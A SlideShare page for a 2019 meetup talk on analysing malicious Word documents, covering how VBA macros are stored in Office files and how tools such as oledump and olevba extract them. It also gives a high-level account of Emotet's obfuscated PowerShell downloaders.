SlideShare une entreprise Scribd logo

Malicious Word Document Analysis

Oguzhan Topgul
Oguzhan Topgul

Malicious Word Document Analysis

Technologie
1  sur  12
Télécharger pour lire hors ligne
WORD DOC ANALYSIS MALICIOUS Silicon Valley Cyber Security Meetup October 2019
MALICIOUS WORD DOC ANALYSIS EMOTET ▸ Attackers actively using word docs with obfuscated macros ▸ Macro runs a powershell script to download main executable
MALICIOUS WORD DOC ANALYSIS HOW MACROS ARE STORED? ▸ MS Office 97-2003 documents ▸ Microsoft Compound File Binary (CFB) a.k.a OLE (Object Linking and Embedding) ▸ Like a filesystem ▸ Consists of segments called streams ▸ VBA Storage contains the source code as compressed https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-doc/ccd7b486-7881-484c-a137-51170af7cc22
MALICIOUS WORD DOC ANALYSIS HOW MACROS ARE STORED? ▸ MS Office 2007+ documents ▸ MS Open XML format ▸ XML Files in a ZIP archive ▸ Macros are stored in a binary OLE file within ZIP archive called “vbaProject.bin”
MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oledump: https://blog.didierstevens.com/programs/oledump-py/ python oledump.py DOC_NAME ▸ oletools: https://github.com/decalage2/oletools sudo -H pip install -U oletools ▸ oleid: to analyze OLE files to detect specific characteristics usually found in malicious files. ▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML). ▸ olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams. ▸ olemeta: to extract all standard properties (metadata) from OLE files. ▸ oletimes: to extract creation and modification timestamps of all streams and storages. ▸ oledir: to display all the directory entries of an OLE file, including free and orphaned entries. ▸ olemap: to display a map of all the sectors in an OLE file.
MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oletools: https://github.com/decalage2/oletools ▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oledump: https://blog.didierstevens.com/programs/ oledump-py/
MALICIOUS WORD DOC ANALYSIS EXTRACT CMD / POWERSHELL FROM VBA SCRIPT ▸ There is going to be a lot of ▸ Unused benign code ▸ Junk code ▸ Obfuscation ▸ String replacements ▸ Powershell code will be the downloader ▸ Download URLs will be obfuscated
LIVE DEMO MALICIOUS WORD DOC ANALYSIS
MALICIOUS WORD DOC ANALYSIS USING DEBUGGER ▸ Microsoft Visual Basic for Applications Editor
LIVE DEMO MALICIOUS WORD DOC ANALYSIS
ANY QUESTIONS?

Recommandé

MongoDB
MongoDBMongoDB
MongoDBjsterce
 
File handling
File handlingFile handling
File handlingNithyaNithyav
 
Working with disconnected data in Windows Store apps
Working with disconnected data in Windows Store appsWorking with disconnected data in Windows Store apps
Working with disconnected data in Windows Store appsAlex Casquete
 
phptut4
phptut4phptut4
phptut4tutorialsruby
 
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019Dave Stokes
 
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...Dave Stokes
 
SAP integration sample payloads for Azure Logic Apps
SAP integration sample payloads for Azure Logic AppsSAP integration sample payloads for Azure Logic Apps
SAP integration sample payloads for Azure Logic AppsDavid Burg
 
Obevo Javasig.pptx
Obevo Javasig.pptxObevo Javasig.pptx
Obevo Javasig.pptxLadduAnanu
 

Recommandé

MongoDB
MongoDBMongoDB
MongoDBjsterce
 
File handling
File handlingFile handling
File handlingNithyaNithyav
 
Working with disconnected data in Windows Store apps
Working with disconnected data in Windows Store appsWorking with disconnected data in Windows Store apps
Working with disconnected data in Windows Store appsAlex Casquete
 
phptut4
phptut4phptut4
phptut4tutorialsruby
 
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019
PHP, The X DevAPI, and the MySQL Document Store -- Benelux PHP Confernece 2019Dave Stokes
 
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...
PHP, The X DevAPI, and the MySQL Document Store Presented January 23rd, 20...Dave Stokes
 
SAP integration sample payloads for Azure Logic Apps
SAP integration sample payloads for Azure Logic AppsSAP integration sample payloads for Azure Logic Apps
SAP integration sample payloads for Azure Logic AppsDavid Burg
 
Obevo Javasig.pptx
Obevo Javasig.pptxObevo Javasig.pptx
Obevo Javasig.pptxLadduAnanu
 
Containerized Data Persistence on Mesos
Containerized Data Persistence on MesosContainerized Data Persistence on Mesos
Containerized Data Persistence on MesosJoe Stein
 
Slides
SlidesSlides
Slideswebhostingguy
 
Mohamed Mahgoub_CV
Mohamed Mahgoub_CVMohamed Mahgoub_CV
Mohamed Mahgoub_CVMohamed Mahgoub
 
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...C4Media
 
Using Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowUsing Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowKarsten Dambekalns
 
Pwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfPwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfrskvp93
 
Daos
DaosDaos
DaosUlrich Krause
 
A walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudA walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudsiculars
 
MongoDB
MongoDBMongoDB
MongoDBMartin Lazarov
 
Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Dave Stokes
 
How to use source control with apex?
How to use source control with apex?How to use source control with apex?
How to use source control with apex?Oliver Lemm
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechkaran saini
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechArpit Meena
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechChristian Esparagoza
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechMicrosoft Tech
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Jim Birch
 
Shell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfShell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfAkhashRamnath
 
Css Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder
 
[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the Basics[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the BasicsUlrich Krause
 
Using MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryUsing MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryMongoDB
 
Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterOguzhan Topgul
 
iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)Oguzhan Topgul
 

Contenu connexe

Similaire à Malicious Word Document Analysis

Containerized Data Persistence on Mesos
Containerized Data Persistence on MesosContainerized Data Persistence on Mesos
Containerized Data Persistence on MesosJoe Stein
 
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...C4Media
 
Using Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowUsing Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowKarsten Dambekalns
 
Pwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfPwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfrskvp93
 
A walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudA walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudsiculars
 
Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Dave Stokes
 
How to use source control with apex?
How to use source control with apex?How to use source control with apex?
How to use source control with apex?Oliver Lemm
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechkaran saini
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechArpit Meena
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Jim Birch
 
Shell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfShell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfAkhashRamnath
 
Css Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder
 
[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the Basics[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the BasicsUlrich Krause
 
Using MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryUsing MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryMongoDB
 

Similaire à Malicious Word Document Analysis (20)

Containerized Data Persistence on Mesos
Containerized Data Persistence on MesosContainerized Data Persistence on Mesos
Containerized Data Persistence on Mesos
 
Slides
SlidesSlides
Slides
 
Mohamed Mahgoub_CV
Mohamed Mahgoub_CVMohamed Mahgoub_CV
Mohamed Mahgoub_CV
 
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
Making Distributed Data Persistent Services Elastic (Without Losing All Your ...
 
Using Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 FlowUsing Document Databases with TYPO3 Flow
Using Document Databases with TYPO3 Flow
 
Pwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdfPwn2Own2021MSExchange3rdVuln.pdf
Pwn2Own2021MSExchange3rdVuln.pdf
 
Daos
DaosDaos
Daos
 
A walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloudA walk down NOSQL Lane in the cloud
A walk down NOSQL Lane in the cloud
 
MongoDB
MongoDBMongoDB
MongoDB
 
Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019Python And The MySQL X DevAPI - PyCaribbean 2019
Python And The MySQL X DevAPI - PyCaribbean 2019
 
How to use source control with apex?
How to use source control with apex?How to use source control with apex?
How to use source control with apex?
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...
 
Shell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdfShell Scripts for Oracle Database and E-Business Suite.pdf
Shell Scripts for Oracle Database and E-Business Suite.pdf
 
Css Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder.com | Cssfounder Net
Css Founder.com | Cssfounder Net
 
[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the Basics[DanNotes] XPages - Beyound the Basics
[DanNotes] XPages - Beyound the Basics
 
Using MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content RepositoryUsing MongoDB to Build a Fast and Scalable Content Repository
Using MongoDB to Build a Fast and Scalable Content Repository
 

Plus de Oguzhan Topgul

Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterOguzhan Topgul
 
iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)Oguzhan Topgul
 
Media Files : Android's New Nightmare
Media Files : Android's New NightmareMedia Files : Android's New Nightmare
Media Files : Android's New NightmareOguzhan Topgul
 
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)Oguzhan Topgul
 
Geçmişten Günümüze Mobil Zararlı Yazılımlar
Geçmişten Günümüze Mobil Zararlı YazılımlarGeçmişten Günümüze Mobil Zararlı Yazılımlar
Geçmişten Günümüze Mobil Zararlı YazılımlarOguzhan Topgul
 
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014Oguzhan Topgul
 
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...Oguzhan Topgul
 

Plus de Oguzhan Topgul (7)

Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow Better
 
iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)iOS'da Zararlı Yazılım Yok (mu?)
iOS'da Zararlı Yazılım Yok (mu?)
 
Media Files : Android's New Nightmare
Media Files : Android's New NightmareMedia Files : Android's New Nightmare
Media Files : Android's New Nightmare
 
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
Androidin Yeni Kabusu: Medya Dosyalari (Media Files: Android's New Nightmare)
 
Geçmişten Günümüze Mobil Zararlı Yazılımlar
Geçmişten Günümüze Mobil Zararlı YazılımlarGeçmişten Günümüze Mobil Zararlı Yazılımlar
Geçmişten Günümüze Mobil Zararlı Yazılımlar
 
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
iOS Güvenlik Mekanizmaları - UNISIP Siber Güvenlik Sempozyumu 2014
 
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
Android'de Parmak Kaldırmadan Konusmak - İzinsiz Uygulamda İzin Kullanmak Sib...
 

Dernier

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 

Dernier (20)

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 

Malicious Word Document Analysis

  • 1. WORD DOC ANALYSIS MALICIOUS Silicon Valley Cyber Security Meetup October 2019
  • 2. MALICIOUS WORD DOC ANALYSIS EMOTET ▸ Attackers actively using word docs with obfuscated macros ▸ Macro runs a powershell script to download main executable
  • 3. MALICIOUS WORD DOC ANALYSIS HOW MACROS ARE STORED? ▸ MS Office 97-2003 documents ▸ Microsoft Compound File Binary (CFB) a.k.a OLE (Object Linking and Embedding) ▸ Like a filesystem ▸ Consists of segments called streams ▸ VBA Storage contains the source code as compressed https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-doc/ccd7b486-7881-484c-a137-51170af7cc22
  • 4. MALICIOUS WORD DOC ANALYSIS HOW MACROS ARE STORED? ▸ MS Office 2007+ documents ▸ MS Open XML format ▸ XML Files in a ZIP archive ▸ Macros are stored in a binary OLE file within ZIP archive called “vbaProject.bin”
  • 5. MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oledump: https://blog.didierstevens.com/programs/oledump-py/ python oledump.py DOC_NAME ▸ oletools: https://github.com/decalage2/oletools sudo -H pip install -U oletools ▸ oleid: to analyze OLE files to detect specific characteristics usually found in malicious files. ▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML). ▸ olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams. ▸ olemeta: to extract all standard properties (metadata) from OLE files. ▸ oletimes: to extract creation and modification timestamps of all streams and storages. ▸ oledir: to display all the directory entries of an OLE file, including free and orphaned entries. ▸ olemap: to display a map of all the sectors in an OLE file.
  • 6. MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oletools: https://github.com/decalage2/oletools ▸ olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
  • 7. MALICIOUS WORD DOC ANALYSIS EXTRACT MACROS FROM WORD DOCS ▸ oledump: https://blog.didierstevens.com/programs/ oledump-py/
  • 8. MALICIOUS WORD DOC ANALYSIS EXTRACT CMD / POWERSHELL FROM VBA SCRIPT ▸ There is going to be a lot of ▸ Unused benign code ▸ Junk code ▸ Obfuscation ▸ String replacements ▸ Powershell code will be the downloader ▸ Download URLs will be obfuscated
  • 10. MALICIOUS WORD DOC ANALYSIS USING DEBUGGER ▸ Microsoft Visual Basic for Applications Editor
  • 11. LIVE DEMO MALICIOUS WORD DOC ANALYSIS